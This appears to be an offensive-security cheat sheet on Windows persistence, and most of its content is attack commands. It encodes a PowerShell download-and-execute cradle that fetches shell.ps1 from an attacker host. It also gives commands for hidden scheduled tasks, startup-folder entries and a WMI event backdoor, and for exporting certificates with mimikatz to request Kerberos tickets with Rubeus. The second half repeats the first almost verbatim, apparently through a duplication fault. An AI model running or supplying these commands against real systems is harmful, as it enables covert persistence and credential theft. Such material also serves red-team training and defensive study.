Twitter Blog

Windows

Encoding commands

In most cases, the commands you want to execute might have special characters, so the best way is to encode them to avoid errors while executing.

  • Windows

$str = 'IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
[System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($str))

  • Linux

str='IEX ((new-object net.webclient).downloadstring("http://<ATTACKER_IP>/shell.ps1"))'
echo -en $str | iconv -t UTF-16LE | base64 -w 0

Task Scheduler

A task that will be executed hourly.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

StartUp Folder

This command will be executed once the user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

WMI

Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad.

Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

User

1. Enumerate the certificates on the machine

.\Seatbelt.exe Certificates

2. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz"

.\mimikatz.exe "crypto::certificates /export" "exit"

3. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

4. Use Rubeus to obtain a TGT.

.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>

Computer

You must be admin

1. Extract the machine certificates.

.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

2. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

3. Request a TGT

.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT>

Task Scheduler

A task that will be executed hourly.

.\SharPersist.exe -t schtask -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -n "Updater" -m add -o hourly

StartUp Folder

This command will be executed once the user logs in.

SharPersist.exe -t startupfolder -c "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -a "-nop -w hidden -enc <ENCODED_PAYLOAD>" -f "UserEnvSetup" -m add

WMI

Create a WMI event subscription that will be executed whenever a process is started. In this case, will be a notepad.

Import-Module .\PowerLurk.ps1
Register-MaliciousWmiEvent -EventName WmiBackdoor -PermanentCommand "C:\Windows\dns_x64.exe" -Trigger ProcessStart -ProcessName notepad.exe

Certificates

Certificates are a valuable tool for maintaining persistent access to both users and computers, as they typically have a longer lifespan compared to passwords. User certificates, for instance, are valid for a full year by default, regardless of any password changes made during that period. Unlike password-based access, certificates only become invalid if they are revoked by the issuing Certificate Authority (CA) or if they expire.

Additionally, certificate-based access does not rely on any vulnerable templates, making it a reliable option for maintaining access. Attackers can extract already issued certificates or request new ones to continue accessing the target system(s) over an extended period of time.

User

1. Enumerate the certificates on the machine

.\Seatbelt.exe Certificates

2. Dump the certificates with mimikatz. The pfx certificate password will be "mimikatz"

.\mimikatz.exe "crypto::certificates /export" "exit"

3. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

4. Use Rubeus to obtain a TGT.

.\Rubeus.exe asktgt /password:mimikatz /nowrap /user:nlamb [/enctype:aes256] /certificate:<BASE64_CERT>

Computer

You must be admin 1. Extract the machine certificates.

.\mimikatz.exe "crypto::capi" "crypto::certificates /systemstore:local_machine /export" "exit"

2. Base64 encode the pfx file.

cat <CERTIFICATE>.pfx | base64 -w 0

3. Request a TGT

.\Rubeus.exe asktgt /user:<HOSTNAME>$ /enctype:aes256 /password:mimikatz /nowrap /certificate:<BASE64_CERT>

Last updated